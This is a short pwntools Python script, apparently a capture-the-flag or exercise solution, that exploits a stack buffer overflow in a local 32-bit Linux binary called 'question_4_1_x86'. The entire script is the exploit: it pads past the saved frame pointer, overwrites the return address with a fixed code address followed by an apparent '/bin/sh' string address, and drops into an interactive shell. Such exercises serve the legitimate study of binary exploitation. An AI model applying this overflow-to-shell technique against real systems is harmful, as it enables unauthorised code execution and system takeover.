from pwn import *
context(log_level='debug', arch='i386', os='linux')
pwnfile = './question_4_1_x86'
io = process(pwnfile)
#io = remote('', )
elf = ELF(pwnfile)
rop = ROP(pwnfile)

padding2ebp = 0x10
padding = padding2ebp + context.word_size//8
# 通过调试得到

return_addr = 0x80491af
sh_addr = 0x0804c03e
payload = flat([cyclic(padding), return_addr, sh_addr])
delimiter = 'input:'
io.sendlineafter(delimiter, payload)
io.interactive()